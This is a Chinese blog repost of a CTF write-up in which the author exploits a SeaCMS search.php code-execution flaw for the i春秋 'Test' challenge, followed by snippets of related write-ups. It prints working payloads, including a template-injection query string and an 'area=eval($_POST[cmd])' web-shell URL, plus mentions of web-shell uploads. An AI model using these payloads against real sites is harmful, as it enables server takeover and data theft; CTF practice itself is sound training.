i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)...

最新推荐文章于 2024-08-28 16:56:49 发布
最新推荐文章于 2024-08-28 16:56:49 发布
阅读量632 收藏
点赞数
文章标签: php 数据库 shell
原文链接:http://www.cnblogs.com/leixiao-/p/9786034.html
版权

打开发现是海洋cms,那就搜索相关漏洞

 

找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49

直接利用其中给出的poc

/search.php

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

 

可以执行系统命令

 

 

没找到flag,考虑可能在数据库中,想上传一句话,然后用菜刀查数据库来着,但是没有写文件的权限,手动查数据库感觉太麻烦,所以换个exp

海洋cms v6.28命令执行漏洞 : https://www.uedbox.com/seacms-v628-0day/

/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

菜刀直接连接

找了好久终于找到数据库配置文件

编辑该条shell配置如下

 

最后得到flag

转载于:https://www.cnblogs.com/leixiao-/p/9786034.html

weixin_30417487
关注
i春秋百度CTF比赛 九月 Test
include_heqile的博客
09-17 1047
https://www.ichunqiu.com/battalion?t=1&r=0 这道题还是蛮不错的,下面我来说一下解题思路 首先进入题目链接,然后搜索seacms相关漏洞,我直接使用了百度出来的第一条,freebuf上的一篇文章: http://www.freebuf.com/vuls/150042.html 漏洞利用方式如下: 我们把eval改成system,把9[]...
百度CTF比赛 九月--Web--Test--Seacms海洋漏洞
残阳泼茶香的博客
04-30 1966
Web题目名称:Test 题目内容: 善于查资料,你就可以拿一血了。 给了我们一个链接 打开就是海洋cms的模板,通过 查百度发现海洋的一个search.php漏洞 Seacms漏洞分析利用复现 By Assassin ichunqiu 通过这两个 复现漏洞(注意 这里 get post 都可以) http://53290ec71e554551a257d1a5ce00ab1...
记一次渗透打靶-海洋CMS+内网渗透
最新发布
m0_55144954的博客
08-28 936
(坑点,当我执行which python时,系统中没有python2,导致我以为python3应该也不会有,走了弯路,所以下次收集信息的时候要全一点)Kali攻击机,在存有shellcode的路径下开启python的http服务。可以看到成功执行命令,命令:whoami,返回:www-data。Kali开启msf监听模块,设置好IP和端口,还有payload。发现失败了,很有可能在传输过程中,命令中的字符被过滤掉了。所以,我选择用msf制作木马,上传后,让其执行。网站指纹识别,海洋CMS,版本6.54。
百度CTF比赛 九月 | TEST
g1ut_t0ny的博客
07-04 373
TEST 1、题目提示会查资料就可以拿一血 2、打开题目很明显是海洋CMS,所以直接搜索他的相关漏洞 3、由于我做题比较晚,所以很明显,等待我的只能是一堆wp 4、白嫖开始 5、在common.inc.php中找到了数据库的相关信息,添加配置 6、管理数据库 ...
百度CTF比赛 九月_Test海洋cms前台getshell
a173262565的博客
04-22 470
题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了...
百度CTF比赛 九月-----Test
大方子
08-02 1415
========================================= 个人收获: 1.连接shell 失败的时候可以试试多个版本的菜刀,可能是菜刀的问题 2.学会了菜刀数据库管理的配置 ============================================ 题目界面: 这个是个cms,我就直接百度查询到现成的漏洞 漏洞地址:http://0day5...
海洋cms漏洞——search.php
qq_40554015的博客
02-13 5200
在i春秋CTF的题,有一道“百度CTF比赛 九月的题叫做Test,是web类型。 打开发现是海洋CMS: 看到是cms,立马搜了一下海洋CMS漏洞,发现网上很多,主要是search.php存在漏洞。 开始解题: 1.在查询栏随便点一个: 看到这么一个url,可以构造一个payload: 不是很清楚为什么······ 2.菜刀连接 接下来就可以直接用菜刀连接了 没有flag,应该在数据库中, 找到search.php,打开看看: 发现包含了common.php
i春秋百度CTF比赛 九月 XSS平台
include_heqile的博客
09-10 4807
https://www.ichunqiu.com/battalion?t=1 这道题是一道代码审计题,对于我这个萌新来说,不看大佬们的writeup是根本无从下手的,得到的提示就是github上的开源项目Rtiny:https://github.com/r0ker/Rtiny-xss/tree/master 大佬们是通过构造非法参数来让网页返回错误信息的,如下: 然后就可以搜索到这个项目...
i春秋百度CTF比赛 十月 Backdoor
include_heqile的博客
09-20 2917
https://www.ichunqiu.com/battalion?t=1&r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
i春秋 web“百度CTF比赛 九月-Upload & code
ChanCherry的博客
10-13 1019
百度CTF比赛 九月Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
Seacms V12.9
weixin_65219040的博客
06-18 1135
通过定位file_get_contents()函数:找寻有可控变量的文件: 进入后台这个页面: 因为已经登入后台,所以找存储型的XSS,在扩展中添加广告,友情链接这些地方进行尝试:直接修改海洋cms名称,拼接js, 存储型XSS: 前台页面:尝试添加系统管理员: 构造poc: 在另一浏览器打开: 网页打开admin_template.php,添加参数action=del&filedir=../templets/default/html/../../../test.php。设置打开这个网页就进行自动
Seacms漏洞
Grey的博客
07-10 5087
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&amp;order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
i春秋CTF训练 Web Test
椰奶冻不安全的博客
07-05 1610
Web Test 题目内容:善于查资料,你就可以拿一血了。 题目链接请在i春秋申请 根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
代码审计之seacms v6.54 前台Getshell 复现分析
weixin_30872867的博客
06-30 589
1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : ""; 并且在v6.54中增加了对传...
CTF--CMS漏洞总结
热门推荐
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
记一次海洋cms任意代码执行漏洞shell(url一句话)
Sea_Sand息禅
03-06 8782
实验环境:海洋CMS6.54(后续版本已该洞已补) 1、后台登录尝试 这个站点是个测试站,站里没什么数据。 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破。有验证码的也有一个爆破软件,可以识别验证码的,但是试了试用不了。 后天失败。。。 2、网上搜集该CMS漏洞 刚才也说了,这个站没什么数据,都是空的,无上传点。 百度搜索海洋CMS漏洞,有好几...
海洋cms v6.53 v6.54版本漏洞复现
weixin_44897902的博客
09-15 2379
参考 https://www.freebuf.com/vuls/150042.html https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg cms首页地址为:http://139.155.1.64/seacms(v6.53)/upload/ 漏洞存在地址为:http://139.155.1.64/seacms(v6...
php通过http请求发送数组
weixin_34319640的博客
10-22 741
最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yu...
海洋CMS6.28命令执行漏洞
番薯道长的博客
11-11 8867
0x00 代码审计 area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数 area参数经过了检测是否是拼音之后 接下来到了 $content=$mainClassObj->parseSearchItemList($content,"area"); 因为能执行php代码一般就是eval()函数 搜索一下这个页
wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF
08-16
另外,在vue.config.js文件中也可以添加相似的配置代码: ``` devServer: { host: '0.0.0.0', port: 3000, client: { webSocketURL: 'wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF/ws', }, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值